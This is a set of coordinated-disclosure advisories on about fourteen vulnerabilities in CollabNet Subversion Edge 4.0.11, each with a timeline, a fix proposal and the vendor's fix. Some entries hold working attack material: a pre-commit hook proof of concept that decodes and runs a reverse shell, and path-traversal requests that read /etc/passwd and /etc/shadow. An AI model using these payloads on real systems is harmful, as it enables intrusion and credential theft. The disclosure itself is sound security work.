CollabNet Subversion Edge multiple vulnerabilities

Vendor Reference

The CollabNet Subversion Edge Management Frontend SVN hook scripts

# Vuln Title: The CollabNet Subversion Edge Management Frontend SVN hook scripts
# privilege escalation
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Privilege escalation design flaw
#
# CVE : Requested
# Risk: High
#
# CVSS Vector: AV:N/Ac:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UC
# CVSS Base Score: 9.0
# CVSS Temporal Score: 7.0
#
# Status: pubic/fixed
# Fixed version: 5.0

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management Frontend allows authenticated
administrators to escalate their privileges by creating and executing hook
scripts. As a result they are able to execute arbitrary commands as the user the
Management Frontend is running under without authenticating with valid
credentials.

POC:

1. Add a pre commit hook with the following content:
    #!/bin/sh
    echo "$base64_encoded_reverseshell" | /usr/bin/base64 -d > /tmp/evil
    /bin/chmod +x /tmp/evil
    /tmp/evil
    exit 0

2. Edit a file of a SVN repository
3. Do: svn commit
4. Get a reverse shell running as the service user of Subversion Edge

Fix proposal:

Provide a configuration option inaccessible from the Web Gui that disables this
feature.

Addtionally implement an authentication prompt that requires the administrator
to authenticate as the user running (which is typically a service user)
the management frontend web app for performing actions on hook scripts.

Vendor fix:

The hook script editor is now disabled by default. It is enabled via the
security.properties file

The CollabNet Subversion Edge Management frontend user credential (hash) leak

# Vuln Title: The CollabNet Subversion Edge Management frontend user credential
# (hash) leak
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Credential leak
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management Frontend leaks the unsalted MD5 hash of
password of the currently logged in user via a "POST /csvn/user/index" request.
An attacker that exploits an XSS or has gained a valid session via other means
is able to retrieve the unsalted MD5 hash of the corresponding user and easily
crack the hash in order to know the users password.

Request 1 (set password)
    POST /csvn/user/index HTTP/1.1
    Host: example.com:4434
    [...]

id=5&version=15&passwd_change_active=false&passwd=aaaaa&confirmPasswd=&realUserName=XXX&email=YYYY&description=ZZZ&_action_update=Update

Response 1:
    HTTP/1.1 302 Found
    [...]
    Location: https://example.com:4434/csvn/user/show/5
    Content-Length: 0

Request 2 (generated by clicking edit in the following page; request below the iamge): 
    GET /csvn/user/edit/5 HTTP/1.1
    Host: example.com:4434
    [...]
    Cookie: SESSID=xxxxxxxxxxxxxxxxxxxx;

Response 2 (leaked hash read from DB and echoed back into password change form):
    HTTP/1.1 200 OK
    [...]
    <input type="password" id="passwd" name="passwd" value="4db81436059d080afe532cc0cbd1cea5"/>

Fix proposal:

Do not echo the current hash in the database back to the user when changing the
password. Only accept passwords as input fields and no hashes.

Vendor fix:

The leak is plugged.

Local file inclusion in CollabNet Subversion Edge Management

# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "filename" parameter of the "downloadHook" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "filename" parameter of the
"downloadHook" action

Vulnerability:

    Example URL:
            https://example.com:4434/csvn/repo/downloadHook/1?filename=../../../../../../etc/passwd

Fix proposal:

Remove feature or santizes the "filename" parameter so that no path traversals
and arbitrary file inclusions are possible.

Vendor fix:

[...] now allow only showing hooks/logs within the intended directories.

Local file inclusion in CollabNet Subversion Edge Management Frontend via logfile “fileName” parameter of the “tail” action

# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "fileName" parameter of the "tail" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "fileName" parameter of the "tail" action

Vulnerability:

    Sample URL:
            https://example.com:4434/csvn/log/tail?fileName=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&startIndex=0

Fix proposal:

Remove feature or santizes the fileName parameter so that no path traversals and
arbitrary file inclusions are possible.

Vendor fix:

[...] now allow only showing hooks/logs within the intended directories.

The CollabNet Subversion Edge management frontend does not require current password upon password change

# Vuln Title: The CollabNet Subversion Edge management frontend does not require
# current password upon password change
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Insecure password change

# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The management frontend does not require the old password for changing the
password to a new one. An authenticated attacker may perform password setting
attacks via XSRF without knowing the current password. An attacker that stole a
Session ID (cookie) is able to gain persistent access by changing the password.

Fix proposal:

A password change should require the old password to be provided.

Vendor fix:

When a user is changing their password, they are now required to enter their
current password.

Local file inclusion in CollabNet Subversion Edge Management Frontend via “fileName” parameter of the show action

# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via "fileName" parameter of the show action
#
# Date: 10.10.2014
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "fileName" parameter of the show action

Vulnerability:

    Request:
            GET /csvn/log/show?fileName=../../../../../../etc/shadow HTTP/1.1
            Host: example.com:4434

    Response:
            HTTP/1.1 200 OK
            [...]
            <div class="span3">../../../../../../etc/passwd</div>
            [...]
            root:x:0:0:root:/root:/bin/bash

Fix proposal:

Remove feature or santizes the fileName parameter so that no path traversals and
arbitrary file inclusions are possible.

Vendor fix:

[...] now allow only showing hooks/logs within the intended directories.

Title: The CollabNet Subversion Edge does not protect against brute forcing accounts

# Vuln Title: The CollabNet Subversion Edge does not protect against brute
# forcing accounts
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Lack of defensive measures
#
# Risk: Medium
# Status: public/fixed
# Fixed versions: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure


Summary:

The CollabNet Subversion Edge Management Frontend does not protect against brute
forcing accounts. An attacker has infinite tries to guess a valid user password.

Fix proposal:

Implement user specific time penalities or lock outs after a certain amount of
failed logins and provide configuration options for that feature.

Vendor fix:

Invalid logins now cause an exponential increase in response time. The rate of
increase and maximum is configurable with the default settings of 1 minute wait
time after 15 invalid logins in 5 minutes.

The CollabNet Subversion Edge Management Frontend does not implement clickjacking protection

# Vuln Title: The CollabNet Subversion Edge Management Frontend does not
# implement clickjacking protection
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Clickjacking
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

It might be possible for a web page controlled by an attacker to load the
content of this response within an iframe on the attacker's page. The
application's response does not set a suitable X-Frame-Options header in order
to prevent framing attacks.

Fix proposal:

To effectively prevent framing attacks, the application should return a response
header with the name X-Frame-Options and the value DENY to prevent framing
altogether, or the value SAMEORIGIN to allow framing only by pages on the same
origin as the response itself.

Vendor fix:

X-Frame-Options is set by default to DENY. It is configurable.

The CollabNet Subversion Edge management frontend login page password field has autocomplete enabled

# Vuln Title: The CollabNet Subversion Edge management frontend login page
# password field has autocomplete enabled
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Lack of defensive measures
#
# Risk: Low
# Status: public/fixed
# Fixed version: 5.0
# https://ctf.open.collab.net/sf/wiki/do/viewPage/projects.svnedge/wiki/Release_5.0.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge management frontend login page password field has
autocomplete enabled. This may allow an attacker to retrieve a stored password
from the browsers key store.

Fix proposal:

Set the autocomplete=off attribute for password fields. Provide an option in the
configuration file to configure this feature.

Vendor fix:

There is now a boolean flag in <data>/conf/security.properties which allow these
organizations to activate autocomplete="off".

The CollabNet Subversion Edge Management Frontend does not implement a strong password policy

# Vuln Title: The CollabNet Subversion Edge Management Frontend does not
# implement a strong password policy
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Lack of defensive measures
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management does not implement a strong password
policy.  Passwords like "aaaaa" are allowed as the only requirement is that the
password is at least 5 characters long

Fix proposal:

Allow for a configuration option that enforces high password complexity.

Vendor fix:

The new default for passwords is to require at least 3 of the following
character classes: uppercase, lowercase, digits, and special characters. A
minimum length of 8 characters is also configurable.

The CollabNet Subversion Edge Management Frontend does not implement XSRF protection tokens

# Vuln Title: The CollabNet Subversion Edge Management Frontend does not implement XSRF protection tokens
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: XSRF
#
# Risk: Low
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management Frontend does not implement XSRF
protection tokens.

Fix proposal:

Implement XSRF protection.

Vendor fix:

Fixed.

The CollabNet Subversion Edge stores passwords as unsalted MD5 hashes

# Vuln Title: The CollabNet Subversion Edge stores passwords as unsalted MD5 hashes
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Insecure password storage

# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management stores passwords as unsalted MD5
hashes. Unsalted MD5 hashes can easily be cracked by brute forcing the password.

Fix proposal:

Use a strong password storage algorithm like scrypt or PBKDF2.

Vendor fix:

We opted to go with bcrypt. It has more usage than scrypt and does not have any
known vulnerabilities; it is  also more easily supported with the subversion
server, not just the Edge admin console. The strength factor is configurable.

The CollabNet Subversion Edge management missing single login restriction

# Vuln Title: The CollabNet Subversion Edge management missing single login
# restriction
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: No single login restriction
#
# Risk: Low
# Status: public/unfixed
# Fixed version: -

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The web application does not restrict users to be logged in only one and does
not provide a configuration options to configure this feature for admins and/or
user accounts.

Fix proposal:

Implement a single login session restriction configuration option for the web
CollabNet web applications. Notify the user if another person has logged in
from another location.

Vendor comment:

This is the only item we decided was not worth the effort. I've not actually
seen this restriction on any webapp I've ever used.

Local file inclusion in CollabNet Subversion Edge Management Frontend via logfile “listViewItem” parameter of the “index” action

# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via logfile "listViewItem" parameter of the "index" action
#
# Date: 28.06.2015
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0

Timeline:

2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure

Summary:

The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via logfile "listViewItem" parameter of the "index"
action

Vulnerability:

    Request:
            POST /csvn/repo/index HTTP/1.1
            Host: example.com:4434
            [...]


id=1&datatable_length=10&listViewItem_../../../../../../etc/passwd=on&_confirmDialogText_copyHook=&_confirmDialogText_renameHook=&_action_downloadHook=Download

    Response:

            HTTP/1.1 200 OK
            Content-Type: text/plain
            Content-disposition: attachment;filename="../../../../../../etc/passwd"
            Content-Length: 1825

            root:x:0:0:root:/root:/bin/bash

Fix proposal:

Remove feature or santizes the "listViewItem" parameter so that no path traversals and
arbitrary file inclusions are possible.

Vendor fix:

[...] now allow only showing hooks/logs within the intended directories.